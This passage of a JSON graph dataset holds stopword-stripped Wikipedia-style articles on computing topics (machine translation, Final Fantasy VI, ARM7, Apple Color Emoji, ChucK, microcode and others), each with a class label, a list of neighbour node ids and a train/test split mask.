without need intermediation human translator despite labelled unworthy competitor human translation 1966 automated language processing advisory committee put together united states government quality machine translation improved levels application online collaboration medical field investigated application technology medical settings human translators absent another topic research difficulties arise due importance accurate translations medical diagnoses many factors affect machine translation systems evaluated factors include intended use translation nature machine translation software nature translation process different programs may work well different purposes example statistical machine translation smt typically outperforms example-based machine translation ebmt researchers found evaluating english french translation ebmt performs better concept applies technical documents easily translated smt formal language certain applications however e.g. product descriptions written controlled language dictionary-based machine-translation system produced satisfactory translations require human intervention save quality inspection various means evaluating output quality machine translation systems oldest use human judges assess translation quality even though human evaluation time-consuming still reliable method compare different systems rule-based statistical systems automated means evaluation include bleu nist meteor lepor relying exclusively unedited machine translation ignores fact communication human language context-embedded takes person comprehend context original text reasonable degree probability certainly true even purely human-generated translations prone error therefore ensure machine-generated translation useful human publishable-quality translation achieved translations must reviewed edited human late claude piron wrote machine translation best automates easier part translator job harder time-consuming part usually involves extensive research resolve ambiguities source text grammatical lexical exigencies target language require resolved research necessary prelude pre-editing necessary order provide input machine-translation software output meaningless addition disambiguation problems decreased accuracy occur due varying levels training data machine translating programs example-based statistical machine translation rely vast array real example sentences base translation many sentences analyzed accuracy jeopardized researchers found program trained 203,529 sentence pairings accuracy actually decreases optimal level training data seems 100,000 sentences possibly training data increases number possible sentences increases making harder find exact translation match although concerns machine translation accuracy dr. ana nino university manchester researched advantages utilizing machine translation classroom one pedagogical method called using mt bad model mt bad model forces language learner identify inconsistencies incorrect aspects translation turn individual hopefully possess better grasp language dr. nino cites teaching tool implemented late 1980s end various semesters dr. nino able obtain survey results students used mt bad model well models overwhelmingly students felt observed improved comprehension lexical retrieval increased confidence target language early 2000s options machine translation spoken signed languages severely limited common belief deaf individuals could use traditional translators however stress intonation pitch timing conveyed much differently spoken languages compared signed languages therefore deaf individual may misinterpret become confused meaning written text based spoken language researchers zhao et al 2000 developed prototype called team translation english asl machine completed english american sign language asl translations program would first analyze syntactic grammatical morphological aspects english text following step program accessed sign synthesizer acted dictionary asl synthesizer housed process one must follow complete asl signs well meanings signs entire text analyzed signs necessary complete translation located synthesizer computer generated human appeared would use asl sign english text user works original subject copyright protection scholars claim machine translation results entitled copyright protection mt involve creativity copyright issue derivative work author original work original language lose rights work translated translator must permission publish translation",
    "neighbors": [
      5122,
      2054,
      10,
      2059,
      3085,
      1044,
      2582,
      3608,
      538,
      8748,
      4662,
      2103,
      3127,
      8759,
      11318,
      3646,
      6208,
      5187,
      4676,
      9796,
      5197,
      2126,
      6223,
      10320,
      3668,
      8803,
      7780,
      8297,
      4092,
      3698,
      116,
      2680,
      133,
      4744,
      3721,
      6798,
      5781,
      3743,
      9375,
      3748,
      3276,
      717,
      10452,
      10456,
      2781,
      2273,
      5857,
      3811,
      2283,
      7918,
      1269,
      8440,
      3323,
      261,
      1289,
      11529,
      11538,
      5399,
      11043,
      7462,
      11056,
      7995,
      3389,
      3902,
      10557,
      8514,
      10569,
      9552,
      10577,
      8538,
      1890,
      8046,
      4468,
      2440,
      3998,
      416,
      9645,
      7599,
      4531,
      2488,
      4025,
      3533,
      2522,
      8688,
      10231,
      7164,
      6655
    ],
    "mask": "Test"
  },
  {
    "node_id": 7165,
    "label": 5,
    "text": "Extensible_Name_Service:extensible name service extensible name service often shortened xns open protocol universal addressing automated data exchange xml-based digital identity architecture development xml 1998 led xns project establishment international non-profit governance organization xns public trust organization xnsorg early 2000 2002 xns specifications contributed xnsorg oasis became part xri extensible resource identifier xdi xri data interchange technical committees together two standards xri xdi form basis formation dataweb xnsorg since evolved xdi.org offers community-based xri/xdi infrastructure",
    "neighbors": [
      4979,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 7166,
    "label": 3,
    "text": "Final_Fantasy_VI:final fantasy vi final fantasy vi released critical acclaim seen landmark title role-playing genre instance ranked 2nd best rpg time ign 2017 snes playstation versions sold 3.48 million copies worldwide date stand-alone game well 750,000 copies part japanese final fantasy collection north american final fantasy anthology final fantasy vi numerous awards considered many one greatest video games time ported tose minor differences sony playstation 1999 nintendo game boy advance 2006 released wii virtual console 2011 nintendo re-released final fantasy vi united states september 2017 part company super nes classic edition game known final fantasy iii first released north america original final fantasy ii final fantasy iii final fantasy v released outside japan time leaving iv second title released outside japan vi third however later localizations use original title like previous final fantasy installments final fantasy vi consists four basic modes gameplay overworld map town dungeon field maps battle screen menu screen overworld map scaled-down version game fictional world player uses direct characters various locations games series three primary means travel across overworld foot chocobo airship plot-driven exceptions enemies randomly encountered field maps overworld traveling foot menu screen player makes decisions characters traveling party equipment wield magic learn configuration gameplay also used track experience points levels game plot develops player progresses towns dungeons town citizens offer helpful information residents item equipment shops later game visiting certain towns activate side-quests dungeons appear variety areas including caves forests buildings dungeons often treasure chests containing rare items available stores dungeons may feature puzzles mazes dungeons requiring player divide characters multiple parties must work together advance dungeon combat final fantasy vi menu-based player selects action list options fight magic item maximum four characters may used battles based series traditional active time battle atb system first featured final fantasy iv system character action bar replenishes rate dependent speed statistic character action bar filled player may assign action addition standard battle techniques character possesses unique special ability example locke possesses ability steal items enemies celes runic ability allows absorb magical attacks cast next turn another element powerful attack substitution occasionally appears character health low similar features appear later final fantasy titles variety different names including limit breaks desperation moves trances overdrives characters rewarded victorious battles experience points money called gil gold piece gp original north american localization characters attain certain amount experience points gain level increases statistics additional player may play battle scenarios control individual characters assigned configuration menu characters final fantasy vi equipped variety weapons armor particular entry powerful accessories known relics weapons armor increase combat capability mostly increasing statistics adding beneficial effects attacks comparison relics variety uses effects almost entirely interchangeable among party members extended sophistication alter basic battle commands exceed normal limitations game systems although final fantasy vi two playable characters start game ability use magic magic may later taught almost playable characters games introduction magicite espers magicite shards contain espers game incarnation series trope summons powerful monstrous beings several recurring series history ifrit shiva bahamut odin besides reappear final fantasy vi approximately two dozen total added later versions game critically game uses setting plot feature heavily around espers remains deceased referred magicite equipped playable characters menu magicite specific set magic spells teach character additionally magicite grant statistical bonus character equipped character gains level finally character equips piece magicite character may summon esper corresponds piece magicite contrast medieval settings featured previous final fantasy titles final fantasy vi set world prominent steampunk influences structure society parallels latter half 19th century opera fine arts serving recurring motifs throughout game level technology comparable second industrial revolution first half game planet referred world balance divided three lush continents northern continent punctuated series mountain ranges southern continent mostly subjugated cruel gestahl empire eastern continent home veldt massive wilderness inhabited monsters world apocalyptic event mid-game transforms planet world ruin withering landmasses fractured numerous islands surrounding larger continent game alludes conflict known war magi occurred one thousand years prior beginning game conflict three quarreling entities known warring triad used innocent humans soldiers transforming enslaved magical beings called espers triad realized wrongdoings freed espers sealed powers inside three stone statues precaution espers sealed statues realm humans concept magic gradually faded myth mankind built society extolling science technology game opening empire taken advantage weakening barrier human esper domains capturing several espers process using espers power source empire created magitek craft combines magic machinery including mechanical infantry infuses humans magical powers empire opposed returners rebel organization seeking free subjugated lands final fantasy vi features fourteen permanent playable characters game main series well several secondary characters briefly controlled player starting character terra branford reserved half-human half-esper girl spent life slave empire thanks mind-controlling device unfamiliar love primary characters include locke cole treasure hunter rebel sympathizer powerful impulse protect women celes chere former general empire joined returners jailed questioning imperial practices edgar roni figaro consummate womanizer king figaro claims allegiance empire secretly supplying aid returners sabin rene figaro edgar independent brother fled royal court hone martial arts skills cyan garamonde loyal knight kingdom doma lost family friends kefka poisoned kingdom water supply setzer gabbiani habitual gambler thrill seeker owner world known airship shadow ninja mercenary offers services empire returners relm arrowny young tough artistic girl magical powers strago magus relm elderly grandfather blue mage gau feral child surviving since infancy veldt mog pike-toting moogle mines narshe umaro savage loyal sasquatch also narshe talked joining returners mog persuasion gogo mysterious fully shrouded master art mimicry main characters game hold significant grudge empire particular kefka palazzo serves one game main antagonists along emperor gestahl clownish kefka became first experimental prototype line magically empowered soldiers called magitek knights rendering insane actions throughout game reflect demented nature supporting character ultros serves recurring villain comic relief handful characters reappeared later games final fantasy sgi short tech demo produced silicon graphics onyx workstation featured polygon-based 3d renderings locke terra shadow town narshe terra participates imperial mission seize powerful esper encased ice upon locating magical reaction occurs terra esper result soldiers accompanying terra killed terra knocked unconscious upon awakening terra informed empire using slave crown control actions crown removed terra remember anything name rare ability use magic unaided terra introduced organization known returners agrees help revolution empire returners learn imperial soldiers led kefka planning another attempt seize frozen esper repelling kefka attack terra experiences another magical reaction frozen esper transforms creature resembling esper flies another continent upon locating terra party confronted esper named ramuh informs group terra may require assistance another esper imprisoned imperial capital city vector vector party attempts rescue several espers however espers already dying magitek experiments choose instead offer lives party transforming magicite group returns terra observes reaction magicite maduin reaction calms terra restores memory reveals half-human half-esper child maduin human woman revelation returners ask terra convince espers join cause travels sealed gate human esper worlds however unbeknownst party empire also uses terra gain access esper world emperor gestahl kefka retrieve statues warring triad raising landmass called floating continent group confronts emperor gestahl kefka floating continent whereupon kefka murders gestahl kefka tampers alignment statues upsets balance magic destroys surface world one year later celes awakens deserted island learns kefka using three statues rule world god-like manner rule causing life slowly wither away celes finds lost comrades decide confront kefka end reign kefka killed statues destroyed magic espers disappear world terra able survive hanging onto human half existence group watches world rejuvenate final fantasy vi entered development release predecessor final fantasy v december 1992 development game took one year complete series creator director hironobu sakaguchi could intimately involved previous installments due projects promotion executive vice president company 1991 reason became producer split director responsibilities final fantasy vi yoshinori kitase hiroyuki ito kitase charge event production scenario ito handled battle aspects sakaguchi supervised kitase cutscene direction ensured project would coalesce whole idea behind story final fantasy vi every character protagonist members development team contributed ideas characters episodes overall plot kitase described hybrid process consequently terra locke conceived sakaguchi celes gau kitase shadow setzer graphic director tetsuya nomura edgar sabin field graphic designer kaori tanaka kitase task unite story premise provided sakaguchi individual ideas character episodes create cohesive narrative scenario final fantasy vi written group four five people among kitase provided key elements story opera scene celes suicide attempt well kefka appearances regular series character designer yoshitaka amano concept art became basis models full motion videos produced game playstation re-release tetsuya takahashi one graphic directors drew imperial magitek armors seen opening scene disregarded sakaguchi intention reuse regular designs elsewhere game sprite art characters in-game appearance drawn kazuko shibuya earlier installments sprites less detailed map battle final fantasy vi equally high resolution regardless screen enabled use animations depicting variety movements facial expressions though first game utilize super nes mode 7 graphics final fantasy vi made extensive use predecessors instance unlike final fantasy iv final fantasy v world map rendered mode 7 lends somewhat three-dimensional perspective otherwise two-dimensional game original north american localization release final fantasy vi square super nes featured several changes original japanese version obvious change game title final fantasy vi final fantasy iii two games series localized north america time final fantasy vi distributed final fantasy iii maintain naming continuity unlike final fantasy iv first released north america final fantasy ii major changes gameplay though several changes contents editorial adjustments exist english script january 1995 interview super play magazine translator ted woolsey explained certain level playfulness ... sexuality japanese games n't exist usa basically nintendo america rules guidelines consequently objectionable graphics e.g nudity censored building signs towns changed bar changed café well religious allusions e.g spell holy renamed pearl also direct allusions death killing actions violent expressions well offensive words replaced softer expressions example edgar locke terra flee chocobos figaro castle kefka orders two magitek armored soldiers chase shouting go kill japanese version translated go get also imperial troopers burn figaro castle edgar claims terra hidden inside castle kefka replies burn death japanese version replaced english version welcome barbecue similarly magitek soldiers watch edgar guests escape chocobos kefka swears japanese translated ted woolsey son submariner localization also featured changes several names tina changed terra finally dialogue text files shortened due limited data storage space available game cartridge read-only memory result additional changes rendered dialogue order compress available space playstation re-release featured minor changes english localization title game reverted final fantasy vi final fantasy iii unify numbering scheme series north america japan earlier release final fantasy vii item character names adjusted expansion fenix phoenix unlike playstation re-release final fantasy iv included later final fantasy chronicles compilation script left essentially unchanged game boy advance re-release featured new translation different translator tom slattery translation preserved character names location names terminology woolsey translation changed item spell names match conventions used recent titles series revised script preserved certain quirky lines original changing editing others cleared certain points confusion original translation wii virtual console release used final fantasy iii name snes game soundtrack final fantasy vi composed long-time series contributor nobuo uematsu score consists themes major character location well music standard battles fights boss enemies special cutscenes extensive use leitmotif one defining points audio tracks aria di mezzo carattere one latter tracks played cutscene involving opera performance track features unintelligible synthesized voice harmonizes melody technical limitations spc700 sound format chip prevented use actual vocal track although developers eventually figured overcome limitation years later orchestral album final fantasy vi grand finale features arranged version aria using italian lyrics performed svetla krasteva orchestral accompaniment version also found ending full motion video game sony playstation re-release lyrics different musical arrangement addition album orchestral game concert 4 includes extended version opera arranged conducted kōsuke onozaki performed tokyo symphony orchestra featuring wakako aokimi tetsuya ōno hiroshi kuroda vocals also performed friends concert gibson amphitheatre 2005 using new english translation lyrics album available dancing mad accompanying game final battle kefka 17 minutes long contains organ cadenza variations kefka theme ending theme combines every playable character theme one composition lasting 21 minutes original score released three compact discs japan final fantasy vi original sound version version album later released north america final fantasy iii kefka domain version album japanese counterpart except different packaging small differences translation track names album newer releases additionally final fantasy vi grand finale features eleven tracks game arranged shirō sagisu tsuneyoshi saito performed ensemble archi della scala orchestra sinfonica di milano milan symphony orchestra second arranged album features thirteen tracks game performed piano reiko nomura recently dancing mad final boss theme final fantasy vi performed play video game symphony stockholm sweden june 2 2007 group machinae supremacy nobuo uematsu former rock band black mages released progressive metal version dancing mad eponymous first album 2003 third album subtitled named premiere track rock opera version entire opera ffvi including aria di mezzo carattere performed etsuyo ota 2012 kickstarter campaign overclocked remix funded 153,633 creation multiple cd album remixes music final fantasy vi andrew aversa directed creation album balance ruin contains 74 tracks 74 artists unique style album free available overclocked remix website final fantasy vi ported sony playstation tose re-released square japan north america 1999 japan available part final fantasy collection north america available part final fantasy anthology europe sold fifty thousand limited-edition copies japanese version also released japan included final fantasy -themed alarm clock final fantasy vi playstation re-release similar original japanese release seen super famicom exception addition two full motion video opening ending sequences new screen-transition effects used start end battles graphics music sound left unchanged original version notable changes gameplay addition loading times present cartridge versions involve correction software bugs original addition new memo save feature allowing players quickly save progress playstation ram re-release included special features bestiary artwork gallery december 18 2012 port re-released part final fantasy 25th anniversary ultimate box japanese package final fantasy vi released psone classic japan april 20 2011 pal territories june 2 2011 released north america december 6 2011 final fantasy vi ported second time tose re-released final fantasy vi advance square enix japan november 30 2006 nintendo north america february 5 2007 europe july 6 2007 game boy advance last game boy advance game released asia includes additional gameplay features slightly better visuals new translation follows japanese naming conventions spells monsters however full-motion videos playstation version game four new espers re-release leviathan gilgamesh cactuar diabolos two new areas include dragons den dungeon includes kaiser dragon monster coded included original soul shrine place player fight monsters continuously three new spells also appear several bugs original fixed addition similarly handheld final fantasy re-releases bestiary music player included even japanese version music player english uses american names e.g strago stragus package features new artwork series veteran original character image designer yoshitaka amano original super famicom version released wii virtual console japan march 15 2011 pal territories europe australia march 18 2011 north america june 30 2011 game released west original north american title final fantasy iii super famicom version later released wii u virtual console japan december 22 2015 square enix released game boy advance version wii u virtual console japan nintendo re-released final fantasy vi worldwide september 2017 part company super nes/super famicom classic edition ports final fantasy vi android ios mobile operating systems announced 2013 mobile-optimized versions game released android january 15 2014 ios february 6 2014 mobile-adapted controls save features redrawn slightly blurry graphics windows pc port port android version released windows pc via steam december 16 2015 steam release featured controls optimized pc steam achievements trading cards final fantasy vi received critical acclaim commercially successful japan upon release mid-1994 square publicity department reported game sold 2.55 million copies japan united states went sale last quarter 1994 became year eighth best-selling snes cartridge despite commercial success region according sakaguchi march 31 2003 game shipped 3.48 million copies worldwide 2.62 million copies shipped japan 860,000 abroad final fantasy collection sold 400,000 copies 1999 making 31st-best-selling release year japan final fantasy anthology sold approximately 364,000 copies north america final fantasy vi advance sold 223,000 copies japan end 2006 one month release gamepro rated 5 5 stating characters plotlines multiple-choice scenarios combine form one fantastic game four reviewers electronic gaming monthly granted unanimous score 9 10 game month award commenting set new standard excellence rpgs particularly praised graphics music strong emotional involvement story several awards electronic gaming monthly 1994 video game awards including best role-playing game best japanese role-playing game best music cartridge-based game additionally later ranked game ninth 1997 list 100 greatest console games time famitsu scored 37 40 making one two highest-rated games 1994 along ridge racer part nintendo power declared game rpg hit decade noting improved sound graphics predecessors game broadened thematic scope moreover suggested much story variation play ... fans may become lost world months time nintendo power also opined game plot particularly inventive story often sappy–not written american audience 1997 nintendo power ranked eighth greatest nintendo game saying everything could want—heroes world-shattering events magic mindless evil—plus interceptor wonder dog 1996 next generation said scene terra cares village orphaned children perhaps safely named series finest hour ... game series tackled big issues reached level emotional depth complexity 2010 nintendo power listed ending final fantasy vi one best finales citing great character moments cement memorable final fantasy protagonists ever also listed opera scene demonstration touching emotional role-playing games release playstation version gamepro electronic gaming monthly rated 4 5 9.5 10 respectively final fantasy collection received 54 60 points weekly famitsu scored panel six reviewers 1999 ign described graphics playstation re-release beautiful stunning reflecting time release final fantasy iii ... represented everything rpg inspiring statistic growth systems would later influence titles like wild arms suikoden moreover praised gameplay storyline claiming aspects took ... preceding rpg concepts either came something completely new refined enough make creating atmosphere players wo n't find difficult get past simplistic graphics seemingly out-dated gameplay conventions become involved rpgamer gave perfect rating original game playstation re-release citing gameplay self-explanatory enough player could pick game customize characters equipment praising music 16-bit masterpiece alternatively describe game sound effects limited game lacking replay value due one ending one fundamental path plot ... mandatory sidequests additionally regarded game english translation unremarkable better worse others offered similar comments gameplay difficulty however referred game storyline unique aspect citing large cast characters nearly receive great deal development surprisingly large number real world issues vast majority addressed rpg since ranging teen pregnancy suicide overall rpgamer regarded game epic masterpiece truly one greatest games ever created game release game boy advance also garnered praise 2007 game boy advance re-release named eighth best game boy advance game time ign feature reflecting game boy advance long lifespan final fantasy vi often regarded one best titles series one best role-playing video games ever created 2005 ign placed final fantasy vi 56th list 100 greatest games second highest ranked final fantasy title list final fantasy iv 2006 nintendo power ranked 13th top 200 game nintendo platform suggesting might best final fantasy ever year readers japanese magazine famitsu voted 25th best game time 2008 final fantasy vi took 1 spot g4 tv top must rpgs list year screwattack named final fantasy vi third best snes game beaten super metroid 2009 final fantasy vi inducted ign videogame hall fame becoming second final fantasy game final fantasy original final fantasy 2012 also ign put final fantasy vi number one list top role-playing video games stating many moments final fantasy vi worthy celebration name biggs wedge leading terra snow poisoning doma sandy boots destruction world tragic opera ultros hold close hearts even including espers poignant character themes series date cheers final fantasy vi may name follow us tumble towards future art entertainment narrative everything keeps us gaming updated version top 100 list 2007 ign ranked final fantasy vi ninth top game time final fantasy games series continued cite game character development especially noted kefka one memorable bad guys rpg history 2009 game informer put snes version final fantasy iii eighth list top games time opining perfected 2d role-playing game fell seventh-place ranking staff gave 2001 2012 staff gamesradar ranked ninth best snes game stating remain effective moving long 1994 release means true work art demands sit high atop list regardless platform already name 14th best game time 2017 staff ign ranked second best rpg game time stating willingness explore heavy themes unthinkable outcomes — made poignant set dramatic set pieces soaring score — one biggest reasons squaresoft ’ 1994 magnum opus special final fantasy vi interactive cg game also known final fantasy sgi demo final fantasy x related actual 10th game final fantasy series final fantasy x short game demo produced square using characters settings final fantasy vi produced using new silicon graphics inc. sgi onyx workstations acquired square demo square first foray 3d graphics many assumed precursor new final fantasy title nintendo 64 video game console also used sgi hardware square however yet committed nintendo console time demo production much technology demonstrated demo later put use rendering fmv sequences final fantasy vii subsequent games playstation demo featured terra branford locke cole shadow series battles game controlled largely mouse gestures example moving cursor shape star would summon dragon attack april 27 2010 square enix producer shinji hashimoto stated development remake final fantasy vi nintendo ds undecided due technical issues later however square discussed remaking vi well v nintendo 3ds 2015 tetsuya nomura director final fantasy vii remake expressed interest remaking final fantasy v vi final fantasy vi included super nes classic edition listed final fantasy iii north american european release september 29 2017",
    "neighbors": [
      5762,
      10051,
      6797,
      2383,
      5436
    ],
    "mask": "None"
  },
  {
    "node_id": 7167,
    "label": 3,
    "text": "Joe_Blade:joe blade joe blade title series budget-price platform games written colin swinbourne published players three titles flick-screen adventures player controls title character number rooms dispatching enemies rescuing innocent people manner varies three games first joe blade title portrayed blade lone commando sent evil mastermind complex release number diplomats one earliest video games placed index germany due accusations glorified war villains resembled ss troopers game still legally obtainable effectively banned game distribution technologies internet available time german publications permitted advertise titles joe blade 2 took rather different approach first game instead soldier blade time vigilante taking city rid streets criminals rescuing old-age pensioners along way blade longer armed gun jump villains touching feet dispatch almost surreal take game stark contrast comparatively gritty realism first installment game also known considerably easier first title almost point many players managed complete game one hour-long sitting spectrum version game featured version invade-a-load featuring pac man joe blade 3 returned first title formula arming blade machine gun exclusively released zx spectrum amstrad cpc included commodore 64 instructions inlay commodore 64 version ever released 1991 players game prison riot plays similarly joe blade titles hacked version identifies joe blade 4 distributed internet",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7168,
    "label": 1,
    "text": "ER/Studio:er/studio er/studio data architecture database design software developed embarcadero technologies er/studio compatible multiple database platforms used data architects data modelers database administrators business analysts create manage database designs document reuse data assets 2015 embarcaero technologies acquired database infrastructure management software company idera inc since acquisition idera inc. er/studio renamed er/studio data architect updated features",
    "neighbors": [
      8808,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 7169,
    "label": 9,
    "text": "MIMIC:mimic mimic known capitalized form former simulation computer language developed 1964 h. e. petersen f. j. sansom l. m. warshawsky systems engineering group within air force materiel command wright-patterson afb dayton ohio united states expression-oriented continuous block simulation language capable incorporating blocks fortran-like algebra mimic development midas modified integration digital analog simulator represented analog computer design written completely fortran one routine compass ran control data supercomputers mimic capable solving much larger simulation models mimic ordinary differential equations describing mathematical models several scientific disciplines engineering physics chemistry biology economics well social sciences easily solved numerical integration results analysis listed drawn diagrams also enables analysis nonlinear dynamic conditions mimic software package written fortran overlay programs executes input statements mathematical model six consecutive passes simulation programs written mimic compiled rather interpreted core simulation package variable step numerical integrator fourth-order runge-kutta method many useful functions related electrical circuit elements exist besides mathematical functions found scientific programming languages need sort statements order dependencies variables since mimic internally parts software organized overlays consider predator-prey model field marine biology determine dynamics fish shark populations simple model choose lotka–volterra equation constants given tutorial wlth initial conditions problem constants given",
    "neighbors": [
      1480,
      9385,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 7170,
    "label": 3,
    "text": "ARM7:arm7 arm7 group older 32-bit risc arm processor cores licensed arm holdings microcontroller use arm7 core family consists arm700 arm710 arm7di arm710a arm720t arm740t arm710t arm7tdmi arm7tdmi-s arm7ej-s arm7tdmi arm7tdmi-s popular cores family since arm7 cores released 1993 2001 longer recommended new ic designs instead arm cortex-m arm cortex-r cores preferred generation introduced thumb 16-bit instruction set providing improved code density compared previous designs widely used arm7 designs implement armv4t architecture implement armv3 armv5tej arm7tdmi 37 registers 31 gpr 6 spr designs use von neumann architecture thus versions containing cache separate data instruction caches arm7 cores obsolete one historically significant model arm7di notable introduced jtag based on-chip debugging preceding arm6 cores support represented jtag tap debugging denoted icebreaker debug module supporting hardware breakpoints watchpoints letting system stalled debugging subsequent cores included enhanced support versatile processor designed mobile devices low power electronics processor architecture capable 130 mips typical 0.13 µm process arm7tdmi processor core implements arm architecture v4t processor supports 32-bit 16-bit instructions via arm thumb instruction sets arm licenses processor various semiconductor companies design full chips based arm processor architecture arm holdings neither manufactures sells cpu devices based designs rather licenses processor architecture interested parties arm offers variety licensing terms varying cost deliverables licensees arm provides integratable hardware description arm core well complete software development toolset right sell manufactured silicon containing arm cpu integrated device manufacturers idm receive arm processor ip synthesizable rtl written verilog form ability perform architectural level optimizations extensions allows manufacturer achieve custom design goals higher clock speed low power consumption instruction set extensions optimizations size debug support etc determine components included particular arm cpu chip consult manufacturer datasheet related documentation original arm7 based earlier arm6 design used armv3 instruction set arm710 variant used cpu module acorn risc pc first arm based system chip designs arm7100 arm7500 used core arm7tdmi arm7 16 bit thumb jtag debug fast multiplier enhanced ice processor implements armv4 instruction set licensed manufacture array semiconductor companies 2009 one widely used arm cores found numerous deeply embedded system designs texas instruments licensed arm7tdmi designed nokia 6110 arm7tdmi-s variant synthesizable core arm7ej-s arm7 enhanced jazelle synthesizable version arm7 implementing armv5te instruction set originally introduced powerful arm9e core",
    "neighbors": [
      11395,
      3467,
      11405,
      398,
      10767,
      2704,
      8720,
      1170,
      659,
      5267,
      7445,
      9366,
      5785,
      666,
      5786,
      4508,
      9371,
      10784,
      2979,
      4773,
      38,
      6949,
      6950,
      8487,
      682,
      4139,
      9638,
      8237,
      2862,
      9391,
      2224,
      11054,
      11314,
      10548,
      823,
      11447,
      1849,
      8250,
      6971,
      9913,
      8253,
      6207,
      8383,
      10945,
      7234,
      7235,
      9155,
      9928,
      2635,
      5963,
      9163,
      6607,
      7631,
      2517,
      4821,
      9685,
      2137,
      4569,
      2524,
      6878,
      6495,
      1377,
      2788,
      7269,
      3050,
      9964,
      11374,
      5617,
      6001,
      4211,
      7281,
      5237,
      630,
      11125,
      8700,
      2814
    ],
    "mask": "None"
  },
  {
    "node_id": 7171,
    "label": 2,
    "text": "Apple_Color_Emoji:apple color emoji apple color emoji color typeface used apple platforms ios macos display emoji characters inclusion emoji iphone unicode standard credited promoting spreading use emoji outside japan many apple icons past present feature design based deep saturated colors gradual transitions color often incorporating subtle gloss effects first version apple color emoji released alongside iphone os 2.2 november 2008 contained 471 individual emoji glyphs originally limited japanese iphone models restriction later lifted designers first apple color emoji typeface raymond sepulveda angela guzman ollie wagner due iphone originally launching japan softbank network apple emoji designs may created resemble softbank phones example 💃 defined unicode 'dancer specified gender feminine apple softbank phones previously masculine gender-neutral others years 2011—2018 apple color emoji font expanded 471 2,776 emoji october 2018 updated emoji keyboard released ios version 8.3 update also added varied skin tones same-gender couples included unicode 6 result human emoji faces switched neutral yellow skin tone default similar smiley emoji majority apple color emoji designs updated release ios 10.2 december 2016 many appearing 3d-rendered according apple vice president user interface design alan dye emoji redesigns due advent animoji memoji higher resolution screens 157 new emoji added ios october 2018 designers apple color emoji typeface versions initial release publicly credited following apple standard practice crediting work individuals former apple employees offered accounts created various designs prior ios 5 softbank encoding used encoding emoji apple devices beginning ios 5 emoji encoded using unicode standard emoji glyphs stored png images several resolutions strikes 20 32 40 48 64 96 160 pixels squared using proprietary sbix table later standardized opentype version 1.8 font contains number easter eggs several glyphs contain portions text apple think different advertisement crazy ones ... including 1f4cb clipboard 📋 1f4c4 page facing 📄 1f4d1 bookmark tabs 📑 1f4d6 open book 📖 among others emoji specified generic objects appear apple products example 1f4bb personal computer 💻 appears modern macbook 231a wristwatch ⌚ shows apple watch 1f301 foggy 🌁 shows golden gate bridge behind san francisco fog reference apple california headquarters 1f4f0 newspaper 📰 headline reads apple times variety styles used original sets example 🐬 🐙 dolphin octopus quite stylized 'button eyes 🐈 🐀 cat rat realistic resembling watercolor paintings mixture styles creates range possible designs example 🐏 🐑 ram sheep look clearly different 🐫 🐪 bactrian camel dromedary calendar emoji 📅 showing july 17 date chosen annual world emoji day date originally referred day apple premiered ical calendar application 2002 although primarily intended onscreen display ios limited printing capabilities printed displays signs used apple color emoji designs new york magazine used apple color emoji printed feature growing use emoji",
    "neighbors": [
      10432,
      9539,
      9732,
      166,
      9912,
      8701
    ],
    "mask": "Test"
  },
  {
    "node_id": 7172,
    "label": 9,
    "text": "ChucK:chuck chuck concurrent strongly timed audio programming language real-time synthesis composition performance runs linux mac os x microsoft windows ios designed favor readability flexibility programmer considerations raw performance natively supports deterministic concurrency multiple simultaneous dynamic control rates another key feature ability live code adding removing modifying code fly program running without stopping restarting highly precise timing/concurrency model allowing arbitrarily fine granularity offers composers researchers powerful flexible programming tool building experimenting complex audio synthesis programs real-time interactive control chuck created chiefly designed ge wang graduate student working perry r. cook chuck distributed freely terms gnu general public license mac os x linux microsoft windows iphone ipad chip chuck iphone distributed limited closed source license currently licensed public however core team stated would like explore ways open chip creating beneficial environment everyone chuck programming language loosely c-like object-oriented language strong static typing chuck distinguished following characteristics chuck standard libraries provide following simple chuck program generates sound music chuck used performances princeton laptop orchestra plork developing smule applications including ocarina emulator plork organizers attribute uniqueness performances live coding perform chuck",
    "neighbors": [
      9345,
      8964,
      6797,
      7571,
      6933,
      6810,
      5037,
      7983,
      5680,
      823,
      9783,
      10819,
      8262,
      3665,
      7128,
      7769,
      9565,
      7550,
      5612,
      7535,
      9210,
      8958
    ],
    "mask": "None"
  },
  {
    "node_id": 7173,
    "label": 3,
    "text": "Microcode:microcode microcode computer hardware technique interposes layer organisation cpu hardware programmer-visible instruction set architecture computer microcode layer hardware-level instructions implement higher-level machine code instructions internal state machine sequencing many digital processing elements microcode used general-purpose central processing units although current desktop cpus fallback path cases faster hardwired control unit handle microcode typically resides special high-speed memory translates machine instructions state machine data input sequences detailed circuit-level operations separates machine instructions underlying electronics instructions designed altered freely also facilitates building complex multi-step instructions reducing complexity computer circuits writing microcode often called microprogramming microcode particular processor implementation sometimes called microprogram extensive microcoding allows small simple microarchitectures emulate powerful architectures wider word length execution units relatively simple way achieve software compatibility different products processor family hardware vendors especially ibm use term microcode synonym firmware way code within device termed microcode regardless microcode machine code example hard disk drives said microcode updated though typically contain microcode firmware lowest layer computer software stack traditionally raw binary machine code instructions processor microcode sits one level avoid confusion microprogram-related element differentiated micro prefix microinstruction microassembler microprogrammer microarchitecture etc engineers normally write microcode design phase processor storing read-only memory rom programmable logic array pla structure combination however machines also exist microcode stored sram flash memory traditionally denoted writeable control store context computers either read-only read-write memory latter case cpu initialization process loads microcode control store another storage medium possibility altering microcode correct bugs instruction set implement new machine instructions complex digital processors may also employ one possibly microcode-based control unit order delegate sub-tasks must performed essentially asynchronously parallel high-level programmer even assembly programmer normally see change microcode unlike machine code often retains backward compatibility among different processors family microcode runs exact electronic circuitry designed constitutes inherent part particular processor design microprograms consist series microinstructions control cpu fundamental level hardware circuitry example single typical horizontal microinstruction might specify following operations simultaneously control processor features one cycle microinstruction often wider 50 bits e.g. 128 bits 360/85 emulator feature microprograms carefully designed optimized fastest possible execution slow microprogram would result slow machine instruction degraded performance related application programs use instructions microcode originally developed simpler method developing control logic computer initially cpu instruction sets hardwired step needed fetch decode execute machine instructions including operand address calculations reads writes controlled directly combinational logic rather minimal sequential state machine circuitry efficient need powerful instruction sets multi-step addressing complex operations see made hard-wired processors difficult design debug highly encoded varied-length instructions contribute well especially irregular encodings used microcode simplified job allowing much processor behaviour programming model defined via microprogram routines rather dedicated circuitry even late design process microcode could easily changed whereas hard-wired cpu designs cumbersome change thus greatly 